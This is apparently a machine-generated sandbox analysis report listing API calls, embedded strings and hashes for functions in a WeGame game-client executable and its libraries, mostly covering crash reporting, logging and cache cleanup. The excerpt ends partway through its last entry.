                                                                • Opcode Fuzzy Hash: 4f23327678cb210834d688bdc7d14eaf2cd09f839c3f7af599adfa6ff0f24a10
                                                                • Instruction Fuzzy Hash: 4FC04C7254030C77DF111E95DC02F993F2AAB04764F444051FA1D1D1A1D6B3D6709A95
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ?get_client_id@util_client_info@ierd_tgp@@YAHXZ.COMMON(?,6BDB2AD3), ref: 6BD8DDAC
                                                                  • Part of subcall function 6BDCD02A: __EH_prolog3_GS.LIBCMT ref: 6BDCD034
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_client_id@util_client_info@ierd_tgp@@H_prolog3_
                                                                • String ID:
                                                                • API String ID: 2109118023-0
                                                                • Opcode ID: c17886725840c015b45c5a4d1e79ee43962f58d5b6a86223b302f8f4e3c97628
                                                                • Instruction ID: e0a5ce8581136b779f481ca576559925a00caa87804778895f6bb9e2e0e4cf25
                                                                • Opcode Fuzzy Hash: c17886725840c015b45c5a4d1e79ee43962f58d5b6a86223b302f8f4e3c97628
                                                                • Instruction Fuzzy Hash: DAB09222B8943402C66915A83C4279A8244EB49E62B12012AEB06E7088CA448A4202D6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetSystemInfo.KERNEL32(?), ref: 6BD02DD5
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: InfoSystem
                                                                • String ID:
                                                                • API String ID: 31276548-0
                                                                • Opcode ID: e2b8090cf334da1b72601d9919bf04af8755cdfc4028b7fdb245a47ac3fae32d
                                                                • Instruction ID: 10eba14eac2be24f4c750a095a9aaad0f1a30e29746eb409f2295c561a3224f7
                                                                • Opcode Fuzzy Hash: e2b8090cf334da1b72601d9919bf04af8755cdfc4028b7fdb245a47ac3fae32d
                                                                • Instruction Fuzzy Hash: EFC04CB9944209DBCF04FFA5C98999B77FCBA09204B500661D916E3340EB70E949CBA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 6BD95262: __EH_prolog3.LIBCMT ref: 6BD95269
                                                                • ?report@Qos@qos@adapt_for_imports@ierd_tgp@@QAE_NABUQos_data_base@234@W4Qos_occasion@234@@Z.COMMON(?,?), ref: 6BD94F54
                                                                  • Part of subcall function 6BD95CE6: __EH_prolog3_GS.LIBCMT ref: 6BD95CF0
                                                                  • Part of subcall function 6BD95CE6: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(0000009C,6BD56BD6,?,00000001,?,00000000,0000008C,6BD577C5,00000002,00000000,?), ref: 6BD95CFF
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@?report@H_prolog3H_prolog3_Logger@1@Qos@qos@adapt_for_imports@ierd_tgp@@Qos_data_base@234@Qos_occasion@234@@
                                                                • String ID:
                                                                • API String ID: 4155978998-0
                                                                • Opcode ID: 664c15afcd16b33eb5d84ecb2b164faac36f646f1b22748259d6e1aecb353c72
                                                                • Instruction ID: 6b31776544b85c381cba6ec6b7f656a96ae1df4ae27602ca9d99325c67ea31d1
                                                                • Opcode Fuzzy Hash: 664c15afcd16b33eb5d84ecb2b164faac36f646f1b22748259d6e1aecb353c72
                                                                • Instruction Fuzzy Hash: 2AB09B651055205A4B1137307D014D977559F4121D3058065ED015A11487159F9746F0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ioctlsocket.WS2_32(6BF6F9D8,8004667E,00000000), ref: 6BF70406
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ioctlsocket
                                                                • String ID:
                                                                • API String ID: 3577187118-0
                                                                • Opcode ID: 5e0365525004fda465add4ecb9850efe7f41c9a3830667bfbfaf4b4992009b98
                                                                • Instruction ID: 413fd68221da14d64861f5acc95d909b4e14d32444096749d186413393c5800a
                                                                • Opcode Fuzzy Hash: 5e0365525004fda465add4ecb9850efe7f41c9a3830667bfbfaf4b4992009b98
                                                                • Instruction Fuzzy Hash: 95C00275408206BF8B019F50C94485ABBE5EB84355F10C929B58991130E731E454CB06
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ?CreateWndImpl@WndMsgReceiver@Tenio@@IAEPAUHWND__@@PBDP6GJPAU3@IIJ@Z@Z.COMMON(?,6BD23E81), ref: 6BD23D27
                                                                  • Part of subcall function 6BD23D44: memset.VCRUNTIME140(?,00000000,00000100), ref: 6BD23D70
                                                                  • Part of subcall function 6BD23D44: strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000100,?), ref: 6BD23D89
                                                                  • Part of subcall function 6BD23D44: CreateWindowExA.USER32(00000000,static,?,00000000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 6BD23DC5
                                                                  • Part of subcall function 6BD23D44: SetLastError.KERNEL32(00000000), ref: 6BD23DD3
                                                                  • Part of subcall function 6BD23D44: SetWindowLongA.USER32(00000000,000000FC,?), ref: 6BD23DDD
                                                                  • Part of subcall function 6BD23D44: GetLastError.KERNEL32 ref: 6BD23DF0
                                                                  • Part of subcall function 6BD23D44: SetLastError.KERNEL32(00000000), ref: 6BD23DF8
                                                                  • Part of subcall function 6BD23D44: SetWindowLongA.USER32(00000000,000000EB), ref: 6BD23E02
                                                                  • Part of subcall function 6BD23D44: GetLastError.KERNEL32 ref: 6BD23E0C
                                                                  • Part of subcall function 6BD23D44: DestroyWindow.USER32(00000000), ref: 6BD23E13
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastWindow$CreateLong$D__@@DestroyImpl@Receiver@Tenio@@memsetstrcpy_s
                                                                • String ID:
                                                                • API String ID: 1278412074-0
                                                                • Opcode ID: 029ea40e00dd6e2d860acd9029da9fe0b3f4b62a2e82c631fb7f5399e9e20a2b
                                                                • Instruction ID: de1b14d60f56c44c75b3fb4bacf0a7422cdc3a4184c1ab61f2563438cace2958
                                                                • Opcode Fuzzy Hash: 029ea40e00dd6e2d860acd9029da9fe0b3f4b62a2e82c631fb7f5399e9e20a2b
                                                                • Instruction Fuzzy Hash: 38B0123140014C3B49101751DC01C0ABA1C47106787004121BB080C020863665A690B8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • HeapAlloc.KERNEL32(00000008,?,00000000,00000000,?,1001CE96,00000001,00000074,?,1001E39D,?,?,?,1001DE15,10019AFD,?), ref: 1001C521
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338444411.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 00000003.00000002.3338431891.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 00000003.00000002.3338466811.0000000010028000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 00000003.00000002.3338481780.000000001002C000.00000008.00000001.01000000.00000008.sdmp
                                                                • Associated: 00000003.00000002.3338495282.000000001002D000.00000004.00000001.01000000.00000008.sdmp
                                                                • Associated: 00000003.00000002.3338508628.0000000010032000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_10000000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: AllocHeap
                                                                • String ID:
                                                                • API String ID: 4292702814-0
                                                                • Opcode ID: 60d4063f3425b058b4fddaae294e715eae1d76beb93be31f8a337db48f4b6848
                                                                • Instruction ID: cf3c69d64b696c2aca4b590771c6cf1581cdf61a2ac28e86295af74e7a3dc965
                                                                • Opcode Fuzzy Hash: 60d4063f3425b058b4fddaae294e715eae1d76beb93be31f8a337db48f4b6848
                                                                • Instruction Fuzzy Hash: 6F014C37A40A2817E311D2281C85F5F3296DB81AF1F270135FD54AF1D2EA70FDC14691
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • memset.VCRUNTIME140(00000001,0000000F,00000001,?,?,?,?,00437597,00000004,00000000), ref: 0043A636
                                                                  • Part of subcall function 0043AF50: memmove.VCRUNTIME140(00000000,7FFFFFFF,00000000,00000001,00000001,0000000F), ref: 0043B01A
                                                                  • Part of subcall function 0043AF50: memset.VCRUNTIME140(00000010,00000001,00000001,00000000,7FFFFFFF,00000000,00000001,00000001,0000000F), ref: 0043B028
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$memmove
                                                                • String ID:
                                                                • API String ID: 3527438329-0
                                                                • Opcode ID: e728354fedcdb21e44f816775a5afb12385b2916075195d7c4d6166d4614394c
                                                                • Instruction ID: 1bb585db8e36a5a5ca42a448406213dbacb29c970ab1b00d26ed1f949447914b
                                                                • Opcode Fuzzy Hash: e728354fedcdb21e44f816775a5afb12385b2916075195d7c4d6166d4614394c
                                                                • Instruction Fuzzy Hash: CE012833240150AFDB149E19EC40AAABB59FBD6718F34806FE5944F242C676D852C7A9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • memset.VCRUNTIME140(00000000,?,?,?,?,?), ref: 6BD0F246
                                                                  • Part of subcall function 6BD0FD30: memmove.VCRUNTIME140(00000000,7FFFFFFF,00000000,?,00000000,0000000F), ref: 6BD0FDFA
                                                                  • Part of subcall function 6BD0FD30: memset.VCRUNTIME140(00000010,?,00000000,00000000,7FFFFFFF,00000000,?,00000000,0000000F), ref: 6BD0FE08
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$memmove
                                                                • String ID:
                                                                • API String ID: 3527438329-0
                                                                • Opcode ID: 6a4bc1ef0bea8c254fde8ea13dc91ab50ae047e0adbae628575e3139394d657f
                                                                • Instruction ID: 2ccff631d21b9dfab48d01e064e6746d4201a38227f700418bfb7b3e5ed94a8e
                                                                • Opcode Fuzzy Hash: 6a4bc1ef0bea8c254fde8ea13dc91ab50ae047e0adbae628575e3139394d657f
                                                                • Instruction Fuzzy Hash: 3A012833200154AFD7048FB8EC40AAABB59FBD2668F30806AE5588F241C776D543C3B5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 6BE24EC0: OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 6BE24F64
                                                                  • Part of subcall function 6BE24EC0: CloseHandle.KERNEL32(00000000), ref: 6BE24F79
                                                                  • Part of subcall function 6BE24EC0: ResetEvent.KERNEL32(00000000), ref: 6BE24F83
                                                                  • Part of subcall function 6BE24EC0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 6BE24FED
                                                                • TlsSetValue.KERNEL32(00000031,?), ref: 6BE260AA
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Event$CloseCreateHandleOpenResetValue
                                                                • String ID:
                                                                • API String ID: 3980803231-0
                                                                • Opcode ID: 0fec71ba128a8aa503668477121c5da1d2abf411f128204d1d501428bc7903e3
                                                                • Instruction ID: 14bb16452ffb9e24989cbc2693587c81f9117ef67a2a7663bf2aede62cdc92ac
                                                                • Opcode Fuzzy Hash: 0fec71ba128a8aa503668477121c5da1d2abf411f128204d1d501428bc7903e3
                                                                • Instruction Fuzzy Hash: E501A272A00104AFCB10DF59DD05F5ABBF8FB4A234F20476AF925D3790DB35A9008BA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • Sleep.KERNEL32(00000064), ref: 6BD9B3C2
                                                                  • Part of subcall function 6BD9B8BA: Sleep.KERNEL32(00000064), ref: 6BD9B948
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: ec6fbcc75c87c865135596c0043644301cf3f37b2238ac86dbfaa1befad1c3a6
                                                                • Instruction ID: d60fd1e6308254f696d772223873ad9ac2586bfebe28cd52705836bc89ce6967
                                                                • Opcode Fuzzy Hash: ec6fbcc75c87c865135596c0043644301cf3f37b2238ac86dbfaa1befad1c3a6
                                                                • Instruction Fuzzy Hash: F4D01731A94634E5DB04B7B834167E923465B46A78F02008AD5401E1C4CB6945875BB2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BD0898B
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: malloc
                                                                • String ID:
                                                                • API String ID: 2803490479-0
                                                                • Opcode ID: e63ee3d4b2af59589055b1da55d61cb1358001cca35225f58a9d8049473eb959
                                                                • Instruction ID: d9fc55d1911c32eae54eea48c5a377ed55d55e7bb365bb5d374dd091a8e90d15
                                                                • Opcode Fuzzy Hash: e63ee3d4b2af59589055b1da55d61cb1358001cca35225f58a9d8049473eb959
                                                                • Instruction Fuzzy Hash: 9DC02B3200030C47CF00DF88D845806739CAA80114B044010F80C8B111C130F1348741
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 0045EA51
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(000002D4), ref: 0045EA63
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(000002D4), ref: 0045EAD8
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,000002D4), ref: 0045EB48
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,000002D4), ref: 0045EB54
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045EB7A
                                                                • ?Instance@CrashReportLoader@crash_report@@SAAAV12@XZ.ADAPT_FOR_IMPORTS ref: 0045EB9E
                                                                • ?AddCrashReportHelperFile@CrashReportLoader@crash_report@@QAEHPB_W00K@Z.ADAPT_FOR_IMPORTS(?,00000000,extra file,00000003), ref: 0045EBBE
                                                                • ?Instance@CrashReportLoader@crash_report@@SAAAV12@XZ.ADAPT_FOR_IMPORTS ref: 0045EBD9
                                                                • ?AddCrashReportHelperFile@CrashReportLoader@crash_report@@QAEHPB_W00K@Z.ADAPT_FOR_IMPORTS(?,00000000,extra file,00000003), ref: 0045EBF1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CrashReport$?get_log_instance@base@@Loader@crash_report@@Logger@1@$File@HelperInstance@V12@$H_prolog3H_prolog3_catch_SimpleString::operator=
                                                                • String ID: )$CrashCount$CrashSignature$ExceptionAddress$ExceptionFirstUserModuleName$WeGame$[CrashCallBackFun]CallBackFun pinfo is null$[CrashCallBackFun]CallBackFun: stage={}$[CrashCallBackFun]ExceptionAddress: {}$[CrashCallBackFun]ExceptionFirstUserModuleName: {}$[CrashCallBackFun]Fail to launch repair_prompt, err:%d$[CrashCallBackFun]crash report file not exist, file:{}$[CrashCallBackFun]crash_signature: {}$[CrashCallBackFun]launching repair_prompt$[CrashCallBackFun]launching repair_prompt succ$[CrashCallBackFun]netbar%d or dev%d do not launch repair_prompt$[CrashCallBackFun]parse json failed$[CrashCallBackFun]read file failed, file:{}$[CrashCallBackFun]unhandled exception, exception_code:{} exception_type:{}, exception folder:{}, process_handle:{}$[TGP]do not report qos.$\crashrpt.json$\tinyget\wegame.tinyget.*.log$\wegame.*.log$crash_log.rs$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp$extra file$got crash_count:%d before$repair_prompt.exe$user_data.update.update_method
                                                                • API String ID: 2294833470-2301710027
                                                                • Opcode ID: 0cd6a7f1a489f10f835650498419a703f04c7f1016c6dd8fc5ef5947e1ec61ed
                                                                • Instruction ID: 75086a895868c6992bdcc55cd50b23bba6b859301609c29a41ac6891653c997b
                                                                • Opcode Fuzzy Hash: 0cd6a7f1a489f10f835650498419a703f04c7f1016c6dd8fc5ef5947e1ec61ed
                                                                • Instruction Fuzzy Hash: AE828F70D40248EADF14EBA5CC99BDEB774AF15308F2040AEE40567292EB785F49CF99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 004063AF
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 0040640D
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 0040663D
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 004066A3
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040686E
                                                                • EnterCriticalSection.KERNEL32(?,85A35C35,?,?), ref: 004068C2
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 004069EC
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00406A50
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00406AE4
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 00406B58
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 00406C14
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 00406DFD
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 00406EB9
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0040705D
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 004071D8
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040723C
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 00407338
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 004073F4
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 004075DC
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 00407698
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040784C
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00407871
                                                                • EnterCriticalSection.KERNEL32(?,85A35C35,?,?), ref: 004078EB
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 004079ED
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00407A51
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 00407B1D
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 00407BD9
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 00407DC7
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 00407E83
                                                                • EnterCriticalSection.KERNEL32(?,85A35C35,?,00000001), ref: 004070D8
                                                                  • Part of subcall function 0040BF70: memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,00402114,?), ref: 0040BF9A
                                                                  • Part of subcall function 0040BF70: memmove.VCRUNTIME140(00000000,?,?,?,?,?,?,?,00402114,?), ref: 0040C051
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,-00000010,00000000,?), ref: 00408061
                                                                • LeaveCriticalSection.KERNEL32(?,?,?,-00000010,00000000,?), ref: 00408086
                                                                  • Part of subcall function 0040BF70: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040C0A1
                                                                • EnterCriticalSection.KERNEL32(?,85A35C35,?,00000000,?,000000FF), ref: 004080F4
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00408155
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _wcsnicmp$_invalid_parameter_noinfo_noreturn$CriticalSection$EnterLeave$memmove
                                                                • String ID: ($VFSHelper::FileExists() $VFSHelper::FindFirstChild() $VFSHelper::FindNextChild() $VFSHelper::GetFileInfo() $`
                                                                • API String ID: 921773079-2146136442
                                                                • Opcode ID: a00391b10745424fb60a2081921dcf60f3faedfa72357ca4dc4d95c9a5998c77
                                                                • Instruction ID: 8c1ef6e9cadccdb1218b1aa8379d3fe16dbc2c95ae20b3109c692f865cbdf85e
                                                                • Opcode Fuzzy Hash: a00391b10745424fb60a2081921dcf60f3faedfa72357ca4dc4d95c9a5998c77
                                                                • Instruction Fuzzy Hash: 52239F70E04258CFDB14CFA8C984BAEBBB1AF45318F24856ED405BB3D1D738A985CB59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • memset.VCRUNTIME140(?,00000000,00000200), ref: 0041E8E1
                                                                • memset.VCRUNTIME140(?,00000000,00000034), ref: 0041E935
                                                                Strings
                                                                Similarity
                                                                • API ID: memset
                                                                • String ID: 4$TA$VFileSysBase::ReadFDTV1() $VFileSysBase::ReadFDTV1() $VFileSysBase::ReadFDTV1() $VFileSysBase::ReadFDTV1() $VFileSysBase::ReadFDTV1() $VFileSysBase::ReadFDTV1() $VFileSysBase::ReadFDTV1() $VFileSysBase::ReadFDTV1() $VFileSysBase::ReadFDTV1() $VFileSysBase::ReadFDTV1() $VFileSysBase::ReadFDTV1() AESFilter::SetKey()$VFileSysBase::ReadFDTV1() CoderFilterA::SetSeedID()$VFileSysBase::ReadFDTV1() CoderFilterW::SetSeedID()$VFileSysBase::ReadFDTV1() FDT entry$VFileSysBase::ReadFDTV1() FDT entry$daeh$daeh$liat$liat$vfs
                                                                • API String ID: 2221118986-4278562756
                                                                • Opcode ID: 518d641a392e8cc669b623aeeba5e952d02b0d2a04d0a0a4f0665361e109163e
                                                                • Instruction ID: 028074c84138df462f802107ffae3a7b19df5b03f0a308a1c25185e3789f15c4
                                                                • Opcode Fuzzy Hash: 518d641a392e8cc669b623aeeba5e952d02b0d2a04d0a0a4f0665361e109163e
                                                                • Instruction Fuzzy Hash: B3928B749002299BCB21DF15CC88BDAB7B5AB44304F1481EAE409A7392D779AFC9CF59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0045E184
                                                                • memset.VCRUNTIME140(?,00000000,00000208,00000CF8), ref: 0045E199
                                                                • GetEnvironmentVariableW.KERNEL32(appdata,?,00000104), ref: 0045E1B2
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0045E1C0
                                                                • memset.VCRUNTIME140(?,00000000,00000208), ref: 0045E24D
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0045E263
                                                                • wcsrchr.VCRUNTIME140(?,0000005C), ref: 0045E272
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045E287
                                                                • memset.VCRUNTIME140(?,00000000,00000208), ref: 0045E295
                                                                • GetFileAttributesW.KERNEL32(?), ref: 0045E2BD
                                                                • memset.VCRUNTIME140(?,00000000,00000208), ref: 0045E2D4
                                                                • memset.VCRUNTIME140(?,00000000,00000250,?,00000104,%s\*.*,?,?,00000000,00000208), ref: 0045E2FF
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0045E315
                                                                • memset.VCRUNTIME140(?,00000000,00000208), ref: 0045E32F
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045E36F
                                                                • wcscmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00485FE0), ref: 0045E392
                                                                • wcscmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00485FE4), ref: 0045E3B4
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0045E40F
                                                                • FindClose.KERNEL32(00000000), ref: 0045E41E
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                  • Part of subcall function 0043F4BB: __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0045E435
                                                                Strings
                                                                • appdata, xrefs: 0045E1AD
                                                                • %s\*.*, xrefs: 0045E2E0
                                                                • %s\%s, xrefs: 0045E3D3
                                                                • [CleanCache] not find temp path., xrefs: 0045E473
                                                                • [CleanCache]succ find temp path., xrefs: 0045E1FA
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp, xrefs: 0045E1E4, 0045E459
                                                                • %s\tencent\wegame\qbcore91\cache, xrefs: 0045E2A1
                                                                Similarity
                                                                • API ID: memset$File$Find$?get_log_instance@base@@Logger@1@SimpleString::operator=wcscmp$AttributesCloseEnvironmentFirstH_prolog3H_prolog3_H_prolog3_catch_ModuleNameNextVariablewcsrchr
                                                                • String ID: %s\%s$%s\*.*$%s\tencent\wegame\qbcore91\cache$[CleanCache] not find temp path.$[CleanCache]succ find temp path.$appdata$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp
                                                                • API String ID: 1552715262-3066486329
                                                                • Opcode ID: 9a2d8ec46530e4738085c5a7ea1d63d374ad8af8d3cda6646221057f8eb07a82
                                                                • Instruction ID: a589235813380b5add3acdeafe7cbd7c0879f177c039c22a2006609a02e6e5b7
